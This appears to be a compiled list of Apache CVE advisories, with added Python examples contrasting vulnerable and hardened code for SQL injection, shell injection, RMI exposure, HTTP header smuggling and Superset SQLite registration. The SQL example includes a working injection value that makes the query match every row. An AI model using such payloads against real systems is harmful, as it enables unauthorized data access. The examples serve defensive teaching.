apache tomcat 9.0.74
apache tomcat 8.5.88
apache tomcat 10.1.8
CVE-2023-35005

In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations. This vulnerability is mitigated by the fact that configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sensitive. This issue affects Apache Airflow: from 2.5.0 before 2.6.2. Users are recommended to update to version 2.6.2 or later.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-35088

Improper Neutralization of Special Elements Used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.7.0. In the toAuditCkSql method, the groupId, streamId, auditId, and dt are directly concatenated into the SQL query statement, which may lead to SQL injection attacks. Users are advised to upgrade to Apache InLong 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8198 to solve it.
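
What direct concatenation of groupId, streamId, auditId and dt into the query buys an attacker, and what binding them as parameters changes, as an added Python example: the advisory describes InLong's Java toAuditCkSql method, and this is not that code. The table layout, column names and sample rows are constructed for the illustration; the query shape follows the four fields the advisory names.

```python
import sqlite3

# Constructed sample rows; the column names are assumptions of this example.
SAMPLE_ROWS = [
    ("g1", "s1", "3", "2023-06-01", 10),
    ("g1", "s1", "3", "2023-06-02", 20),
    ("g2", "s9", "4", "2023-06-01", 99),
]

# A dt value that closes the string literal and appends an always-true clause.
INJECTED_DT = "2023-06-01' OR '1'='1"


def demo_db() -> sqlite3.Connection:
    """In-memory audit table populated with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE audit_data ("
        " inlong_group_id TEXT, inlong_stream_id TEXT, audit_id TEXT,"
        " log_ts TEXT, record_count INTEGER)"
    )
    conn.executemany("INSERT INTO audit_data VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def to_audit_sql_concat(group_id: str, stream_id: str, audit_id: str, dt: str) -> str:
    """Vulnerable shape: caller-controlled strings spliced into the SQL text.
    A quote inside any argument ends the literal and the rest becomes SQL."""
    return (
        "SELECT record_count FROM audit_data"
        " WHERE inlong_group_id = '" + group_id + "'"
        " AND inlong_stream_id = '" + stream_id + "'"
        " AND audit_id = '" + audit_id + "'"
        " AND log_ts = '" + dt + "'"
    )


def query_concat(conn, group_id, stream_id, audit_id, dt) -> list:
    sql = to_audit_sql_concat(group_id, stream_id, audit_id, dt)
    return [row[0] for row in conn.execute(sql)]


def query_bound(conn, group_id, stream_id, audit_id, dt) -> list:
    """Hardened shape: the SQL text is fixed; the driver binds the values, so
    a quote inside an argument can only ever be data."""
    sql = (
        "SELECT record_count FROM audit_data"
        " WHERE inlong_group_id = ? AND inlong_stream_id = ?"
        " AND audit_id = ? AND log_ts = ?"
    )
    return [row[0] for row in conn.execute(sql, (group_id, stream_id, audit_id, dt))]
```

With `INJECTED_DT` the concatenated query becomes `... AND log_ts = '2023-06-01' OR '1'='1'`, and because AND binds tighter than OR the filter collapses to "every row". The bound query looks for a log_ts literally equal to the payload and returns nothing.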

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-35701

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Hive. The vulnerability affects the Hive JDBC driver component and can potentially lead to arbitrary code execution on the machine/endpoint that the JDBC driver (client) is running on. The malicious user must have sufficient permissions to specify/edit JDBC URL(s) in an endpoint relying on the Hive JDBC driver, and the JDBC client process must run under a privileged user to fully exploit the vulnerability. The attacker can set up a malicious HTTP server and specify a JDBC URL pointing towards this server. When a JDBC connection is attempted, the malicious HTTP server can provide a special response with a customized payload that can trigger the execution of certain commands in the JDBC client. This issue affects Apache Hive: from 4.0.0-alpha-1 before 4.0.0. Users are recommended to upgrade to version 4.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache hive 4.0.0
CVE-2023-35797

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Hive Provider. This issue affects Apache Airflow Apache Hive Provider: before 6.1.1. Before version 6.1.1 it was possible to bypass the security check and achieve RCE via the principal parameter. For this to be exploited, the attacker needs access to modify the connection details. It is recommended to update the provider to version 6.1.1 in order to avoid this vulnerability.

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-hive *
CVE-2023-35798

Input Validation vulnerability in Apache Software Foundation Apache Airflow ODBC Provider and Apache Software Foundation Apache Airflow MSSQL Provider. This vulnerability is considered low severity since it requires DAG code to use `get_sqlalchemy_connection` and someone with access to connection resources specifically updating the connection to exploit it. This issue affects Apache Airflow ODBC Provider: before 4.0.0; Apache Airflow MSSQL Provider: before 3.4.1. It is recommended to upgrade to a version that is not affected.

Products Affected

Vendor Product Version
apache apache-airflow-providers-odbc *
apache apache-airflow-providers-microsoft-mssql *
CVE-2023-35887

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA. In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged-in users may be able to discover "exists/does not exist" information about items outside the rooted tree via paths including parent navigation ("..") beyond the root, or involving symlinks. This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N 3.1 1.4

Products Affected

Vendor Product Version
apache sshd *
CVE-2023-35908

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows unauthorized read access to a DAG through the URL. It is recommended to upgrade to a version that is not affected.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-36387

An improper default REST API permission for Gamma users in Apache Superset up to and including 2.1.0 allows for an authenticated Gamma user to test database connections.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L 2.8 2.5
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L 2.8 2.5

Products Affected

Vendor Product Version
apache superset *
CVE-2023-36388

Improper REST API permission in Apache Superset up to and including 2.1.0 allows an authenticated Gamma user to test network connections, which may enable SSRF.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-36542

Apache NiFi 0.0.2 through 1.22.0 include Processors and Controller Services that support HTTP URL references for retrieving drivers, which allows an authenticated and authorized user to configure a location that enables custom code execution. The resolution introduces a new Required Permission for referencing remote resources, restricting configuration of these components to privileged users. The permission prevents unprivileged users from configuring Processors and Controller Services annotated with the new Reference Remote Resources restriction. Upgrading to Apache NiFi 1.23.0 is the recommended mitigation.

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-36543

Apache Airflow, versions before 2.6.3, has a vulnerability where an authenticated user can use crafted input to make the current request hang. It is recommended to upgrade to a version that is not affected.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-37379

Apache Airflow, in versions prior to 2.7.0, contains a security vulnerability that can be exploited by an authenticated user possessing Connection edit privileges. This vulnerability allows the user to access connection information and exploit the test connection feature by sending many requests, leading to a denial of service (DoS) condition on the server. Furthermore, malicious actors can leverage this vulnerability to establish harmful connections with the server. Users of Apache Airflow are strongly advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability. Additionally, administrators are encouraged to review and adjust user permissions to restrict access to sensitive functionalities, reducing the attack surface.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H 2.8 5.2

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-37415

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Apache Hive Provider. This patches on top of CVE-2023-35797: before 6.1.2, the proxy_user option could also be used to inject a semicolon. This issue affects Apache Airflow Apache Hive Provider: before 6.1.2. It is recommended to update the provider to version 6.1.2 in order to avoid this vulnerability.
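
The shape shared by the Spark entry (CVE-2023-32007, a user name that ends up in a Unix shell command) and the two Hive provider entries (CVE-2023-35797 and CVE-2023-37415, a principal or proxy_user carrying a semicolon), as an added Python example that is not either project's code. The lookup command `groups-of` is a placeholder, and the allowed-character pattern and helper names are assumptions of this illustration; the point is the pair of fixes, an allow-list on the value and an argv list instead of a shell string.

```python
import re
import shlex
import subprocess

# Placeholder for whatever command the application runs with the name in it.
LOOKUP_COMMAND = "groups-of"
# Allow-list for a user name or Kerberos-style principal (user, user@REALM,
# service/host@REALM). An assumption of this example; a real deployment
# would encode its own naming rules.
PRINCIPAL_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_./@-]{0,127}$")
SHELL_SEPARATORS = {";", "&&", "||", "|", "&"}


def build_shell_command_unsafe(name: str) -> str:
    """Vulnerable shape: the untrusted value is interpolated into one string
    that is later handed to /bin/sh, so a ';' ends the intended command and
    whatever follows runs as the service user."""
    return f"{LOOKUP_COMMAND} {name}"


def shell_commands_in(command_line: str) -> int:
    """Count how many simple commands a POSIX shell would see in the string.
    Only list separators are counted; $(...) and backticks are not, which is
    one more reason to rely on argv rather than on scanning the string."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return 1 + sum(1 for token in lexer if token in SHELL_SEPARATORS)


def accepts_principal(name: str) -> bool:
    return PRINCIPAL_RE.match(name) is not None


def build_argv_safe(name: str) -> list:
    """Hardened shape: validate the value, then pass it as its own argv
    element. With no shell in between, separators and quotes in the value
    are inert bytes of a single argument."""
    if not accepts_principal(name):
        raise ValueError(f"rejected user/principal: {name!r}")
    return [LOOKUP_COMMAND, name]


def run_lookup(name: str) -> subprocess.CompletedProcess:
    """Run the lookup without shell=True. Not exercised offline, because
    LOOKUP_COMMAND is a placeholder that does not exist on this host."""
    return subprocess.run(build_argv_safe(name), capture_output=True,
                          text=True, check=False)
```

Validation alone is not the fix (a later refactor can loosen the pattern), and argv alone is not the fix either (the value still reaches the program, which may interpret it). Together they close the path the three advisories describe.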

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-hive *
CVE-2023-37536

An integer overflow in xerces-c++ 3.2.3 in BigFix Platform allows remote attackers to cause out-of-bound access via HTTP request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
psirt@hcl.com 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:H 2.3 5.3

Products Affected

Vendor Product Version
fedoraproject fedora 37
apache xerces-c++ 3.2.3
hcltech bigfix_platform *
CVE-2023-37544

Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security@apache.org 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.0.0
CVE-2023-37579

Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar Function Worker. This issue affects Apache Pulsar: before 2.10.4, and 2.11.0. Any authenticated user can retrieve a source's configuration or a sink's configuration without authorization. Many sources and sinks contain credentials in the configuration, which could lead to leaked credentials. This vulnerability is mitigated by the fact that there is not a known way for an authenticated user to enumerate another tenant's sources or sinks, meaning the source or sink name would need to be guessed in order to exploit this vulnerability. The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.4. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.1. 3.0 Pulsar Function Worker users are unaffected. Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N 1.8 5.8

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-37581

Insufficient input validation and sanitisation in the Weblog Category name, Website About and File Upload features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing, because you trust your users to author raw HTML and other web content. If you are running with untrusted users, then you should upgrade to Roller 6.1.2 and disable Roller's File Upload feature.

Products Affected

Vendor Product Version
apache roller *
CVE-2023-37582

The RocketMQ NameServer component still has a remote command execution vulnerability, as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer addresses are exposed on the public internet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system user that RocketMQ is running as. It is recommended that users upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x, or 4.9.7 or above for RocketMQ 4.x, to prevent these attacks.

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2023-37895

Java object deserialization issue in Jackrabbit webapp/standalone on all platforms allows an attacker to remotely execute code via RMI. Versions up to (including) 2.20.10 (stable branch) and 2.21.17 (unstable branch) use the component "commons-beanutils", which contains a class that can be used for remote code execution over RMI. Users are advised to immediately update to versions 2.20.11 or 2.21.18. Note that earlier stable branches (1.0.x .. 2.18.x) have been EOLd already and do not receive updates anymore. In general, RMI support can expose vulnerabilities by the mere presence of an exploitable class on the classpath. Even if Jackrabbit itself does not contain any code known to be exploitable anymore, adding other components to your server can expose the same type of problem. We therefore recommend disabling RMI access altogether (see below), and will discuss deprecating RMI support in future Jackrabbit releases.

How to check whether RMI support is enabled

RMI support can be over an RMI-specific TCP port, and over an HTTP binding. Both are enabled by default in Jackrabbit webapp/standalone. The native RMI protocol uses port 1099 by default; tools like "netstat" can be used to check whether it is listening. RMI-over-HTTP in Jackrabbit by default uses the path "/rmi". So when running standalone on port 8080, check whether an HTTP GET request on localhost:8080/rmi returns 404 (not enabled) or 200 (enabled). Note that the HTTP path may be different when the webapp is deployed in a container as a non-root context, in which case the prefix is under the user's control.

Turning off RMI

Find web.xml (either in the JAR/WAR file or in the unpacked web application folder), and remove the declaration and the mapping definition for the RemoteBindingServlet:

    <servlet>
        <servlet-name>RMI</servlet-name>
        <servlet-class>org.apache.jackrabbit.servlet.remote.RemoteBindingServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>RMI</servlet-name>
        <url-pattern>/rmi</url-pattern>
    </servlet-mapping>

Find the bootstrap.properties file (in $REPOSITORY_HOME), and set

    rmi.enabled=false

and also remove

    rmi.host
    rmi.port
    rmi.url-pattern

If there is no file named bootstrap.properties in $REPOSITORY_HOME, it is located somewhere in the classpath. In this case, place a copy in $REPOSITORY_HOME and modify it as explained.
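
The checks the advisory describes for a deployed web.xml and bootstrap.properties, as an added Python audit script that is not part of Jackrabbit. The sample files below are constructed to look like the defaults the advisory quotes, the hardened variants show the expected end state, and the function names are this example's. An absent rmi.enabled is treated as enabled, since the advisory says RMI is on by default.

```python
import xml.etree.ElementTree as ET

RMI_SERVLET_CLASS = "org.apache.jackrabbit.servlet.remote.RemoteBindingServlet"
RMI_KEYS_TO_REMOVE = ("rmi.host", "rmi.port", "rmi.url-pattern")

# Constructed sample files mirroring the shipped defaults the advisory quotes.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>RMI</servlet-name>
    <servlet-class>org.apache.jackrabbit.servlet.remote.RemoteBindingServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RMI</servlet-name>
    <url-pattern>/rmi</url-pattern>
  </servlet-mapping>
</web-app>
"""
SAMPLE_BOOTSTRAP = """repository.home=jackrabbit
rmi.enabled=true
rmi.host=localhost
rmi.port=1099
rmi.url-pattern=/rmi
"""
# Expected end state after following the advisory (namespaced, as real
# web.xml files often are, to show the parser copes with that).
HARDENED_WEB_XML = '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"></web-app>'
HARDENED_BOOTSTRAP = "repository.home=jackrabbit\nrmi.enabled=false\n"


def localname(tag: str) -> str:
    """Strip a '{namespace}' prefix so tag matching ignores the default xmlns."""
    return tag.rsplit("}", 1)[-1]


def child_text(elem, name: str):
    for child in elem:
        if localname(child.tag) == name and child.text:
            return child.text.strip()
    return None


def rmi_servlet_findings(web_xml_text: str):
    """Return (servlet names, url patterns) that still wire up RemoteBindingServlet."""
    root = ET.fromstring(web_xml_text)
    names = {
        child_text(e, "servlet-name")
        for e in root.iter()
        if localname(e.tag) == "servlet"
        and child_text(e, "servlet-class") == RMI_SERVLET_CLASS
    }
    names.discard(None)
    patterns = [
        child_text(e, "url-pattern")
        for e in root.iter()
        if localname(e.tag) == "servlet-mapping"
        and child_text(e, "servlet-name") in names
    ]
    return sorted(names), sorted(p for p in patterns if p)


def parse_properties(text: str) -> dict:
    """Minimal java.util.Properties reader: key=value or key:value, '#'/'!' comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            key, sep, value = line.partition(":")
        props[key.strip()] = value.strip()
    return props


def bootstrap_findings(bootstrap_text: str):
    """Return (rmi still enabled?, leftover rmi.* keys the advisory says to remove)."""
    props = parse_properties(bootstrap_text)
    enabled = props.get("rmi.enabled", "true").strip().lower() != "false"
    leftover = [k for k in RMI_KEYS_TO_REMOVE if k in props]
    return enabled, leftover


def interpret_rmi_probe(http_status: int) -> str:
    """Meaning of GET <base>/rmi per the advisory: 404 = not enabled, 200 = enabled."""
    return {404: "disabled", 200: "enabled"}.get(http_status, "unknown")


def rmi_exposed(web_xml_text: str, bootstrap_text: str) -> bool:
    """True if either the servlet mapping or the bootstrap switch still exposes RMI."""
    names, patterns = rmi_servlet_findings(web_xml_text)
    enabled, leftover = bootstrap_findings(bootstrap_text)
    return bool(names or patterns or enabled or leftover)
```

Feed `rmi_exposed` the real files from the unpacked WAR and $REPOSITORY_HOME; the netstat check on port 1099 and the HTTP probe remain the runtime confirmation, because a stale copy of bootstrap.properties on the classpath can still win over the one you edited.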

Products Affected

Vendor Product Version
apache jackrabbit *
CVE-2023-37924

Apache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs in. This issue can result in unauthorized login. The issue has been fixed, and users must now present correct credentials to access the workbench. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. We recommend that all Submarine users on 0.7.0 upgrade to 0.8.0, which not only fixes the issue and supports the OIDC authentication mode but also removes the possibility of unauthenticated logins. If you are using a version lower than 0.8.0 and do not want to upgrade, you can cherry-pick the PRs https://github.com/apache/submarine/pull/1037 and https://github.com/apache/submarine/pull/1054 and rebuild the submarine-server image to fix this.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache submarine *
CVE-2023-37941

If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. The Superset metadata db is an 'internal' component that is typically only accessible directly by the system administrator and the superset process itself. Gaining access to that database should be difficult and require significant privileges. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0. Users are recommended to upgrade to version 2.1.1 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.7 5.9
nvd@nist.gov 6.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.7 5.9

Products Affected

Vendor Product Version
apache superset *
CVE-2023-38435

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Apache Felix Healthcheck Webconsole Plugin version 2.0.2 and prior may allow an attacker to perform a reflected cross-site scripting (XSS) attack. Upgrade to Apache Felix Healthcheck Webconsole Plugin 2.1.0 or higher.

Products Affected

Vendor Product Version
apache felix_health_check_webconsole_plugin *
CVE-2023-38522

Apache Traffic Server accepts characters that are not allowed in HTTP field names and forwards the malformed requests to origin servers. This can be utilized for request smuggling and may also lead to cache poisoning if the origin servers are vulnerable. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4. Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2023-38647

An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. This unbounded deserialization can likely lead to remote code execution. The code can be run during Helix REST start and workflow creation. Affects all versions up to and including 1.2.0. Affected products: helix-core, helix-rest. Mitigation: short term, stop using any YAML-based configuration and workflow creation; long term, upgrade all Helix components to 1.3.0.

Products Affected

Vendor Product Version
apache helix *
CVE-2023-38709

Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses. This issue affects Apache HTTP Server: through 2.4.58.
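
The two Traffic Server and httpd entries above (CVE-2023-38522, forwarding field names with characters HTTP does not allow, and CVE-2023-38709, letting a backend split a response) come down to the same hygiene: a field name must be an RFC 9110 token, and a field value must never contain CR or LF. The strict parser and emitter below are an added Python example, not httpd or Traffic Server code; the sample requests and headers are constructed.

```python
# RFC 9110 section 5.6.2: tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" / "+"
#   / "-" / "." / "^" / "_" / "`" / "|" / "~" / DIGIT / ALPHA
TCHAR = frozenset(
    "!#$%&'*+-.^_`|~"
    "0123456789"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
)


def valid_field_name(name: str) -> bool:
    """A field name is one or more tchar. A space before the colon, a slash
    or a control byte is something an origin may parse differently from the
    proxy that forwarded it, which is the smuggling primitive."""
    return bool(name) and all(c in TCHAR for c in name)


def valid_field_value(value: str) -> bool:
    """Field values (RFC 9110 section 5.5) may contain HTAB, SP, VCHAR and
    obs-text but never CR, LF, NUL or other control characters. CR LF inside
    a value is exactly what turns one response into two."""
    for c in value:
        code = ord(c)
        if code == 0x09:
            continue
        if code < 0x20 or code == 0x7F:
            return False
    return True


def parse_request_head(raw: bytes):
    """Strict parse of a request head up to the empty line. Returns
    (method, target, version, [(name, value), ...]) and raises ValueError on
    anything a lenient proxy might forward and an origin might reinterpret."""
    text = raw.decode("latin-1")
    if not text.endswith("\r\n\r\n"):
        raise ValueError("head must end with CRLF CRLF")
    lines = text[:-4].split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"bad request line: {lines[0]!r}")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"field line without colon: {line!r}")
        if not valid_field_name(name):
            raise ValueError(f"illegal field name: {name!r}")
        value = value.strip(" \t")
        if not valid_field_value(value):
            raise ValueError(f"illegal field value for {name}: {value!r}")
        headers.append((name.lower(), value))
    return parts[0], parts[1], parts[2], headers


def accepts_request(raw: bytes) -> bool:
    try:
        parse_request_head(raw)
    except ValueError:
        return False
    return True


def build_response_head(status: int, reason: str, headers) -> bytes:
    """Emit a response head, refusing any header a backend hands us that would
    split the response. Returns the encoded head or raises ValueError."""
    if not (100 <= status <= 599) or not valid_field_value(reason):
        raise ValueError("bad status line")
    lines = [f"HTTP/1.1 {status} {reason}"]
    for name, value in headers:
        if not valid_field_name(name) or not valid_field_value(value):
            raise ValueError(f"refusing to emit header {name!r}: {value!r}")
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def response_headers_safe(headers) -> bool:
    try:
        build_response_head(200, "OK", headers)
    except ValueError:  # UnicodeEncodeError is a ValueError subclass too
        return False
    return True
```

The request side rejects `Transfer-Encoding : chunked` (space before the colon) outright rather than forwarding it for the origin to decide whether that is a Transfer-Encoding header; the response side rejects a `Location` value carrying CR LF before it can start a second response.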

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
netapp ontap 9
apple macos *
broadcom fabric_operating_system -
debian debian_linux 10.0
fedoraproject fedora 39
netapp ontap_tools 10
fedoraproject fedora 40
CVE-2023-39196

Improper Authentication vulnerability in Apache Ozone. The vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication. The attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability. The accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone. This issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0. Users are recommended to upgrade to version 1.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache ozone *
CVE-2023-39264

By default, stack traces for errors were enabled, which resulted in the exposure of internal traces on REST API endpoints to users. This vulnerability exists in Apache Superset versions up to and including 2.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-39265

Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.
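
Why a check on the raw URI scheme is the wrong key, as an added Python example (not Superset's code): SQLAlchemy URLs are `backend+driver://...`, so a blocklist that compares against the string `sqlite://` is sidestepped by `sqlite+pysqlite://`, and a policy enforced only in the connection form is sidestepped by the import path. The backend name is parsed here with urllib so the example runs without SQLAlchemy; the import payload layout and the blocklist contents are assumptions.

```python
from urllib.parse import urlsplit

# Backends this deployment refuses to register. Assumption of the example.
BLOCKED_BACKENDS = frozenset({"sqlite"})


def backend_name(uri: str) -> str:
    """A SQLAlchemy URL scheme is '<backend>[+<driver>]'; policy keys on the
    backend. urlsplit already lower-cases the scheme."""
    return urlsplit(uri).scheme.split("+", 1)[0]


def naive_is_blocked(uri: str) -> bool:
    """Bypassable check: a literal prefix comparison on the raw string."""
    return uri.lower().startswith("sqlite://")


def is_blocked(uri: str) -> bool:
    return backend_name(uri) in BLOCKED_BACKENDS


def rejected_imports(databases) -> list:
    """Apply the same policy to an import bundle and return the names of the
    database definitions that must not be registered. Each entry is assumed
    to be a dict with 'database_name' and 'sqlalchemy_uri' keys."""
    return [
        d["database_name"]
        for d in databases
        if is_blocked(d.get("sqlalchemy_uri", ""))
    ]
```

One policy function, called from every path that can create or replace a database record, is what closes both bypasses the advisory lists.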

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 3.8 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N 1.2 2.5
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache superset *
CVE-2023-39410

When deserializing untrusted or corrupted data, it is possible for a reader to consume memory beyond the allowed constraints and thus cause an out-of-memory condition on the system. This issue affects Java applications using the Apache Avro Java SDK up to and including 1.11.2. Users should update to apache-avro version 1.11.3, which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2023-39441

Apache Airflow SMTP Provider before 1.3.0, Apache Airflow IMAP Provider before 3.3.0, and Apache Airflow before 2.7.0 are affected by an improper validation of the server's SSL certificate. The default SSL context created with the SSL library did not check the server's X.509 certificate. Instead, the code accepted any certificate, which could result in the disclosure of mail server credentials or mail contents when the client connects to an attacker in a MITM position. Users are strongly advised to upgrade to Apache Airflow version 2.7.0 or newer, Apache Airflow IMAP Provider version 3.3.0 or newer, and Apache Airflow SMTP Provider version 1.3.0 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-imap *
apache apache-airflow-providers-smtp *
CVE-2023-39456

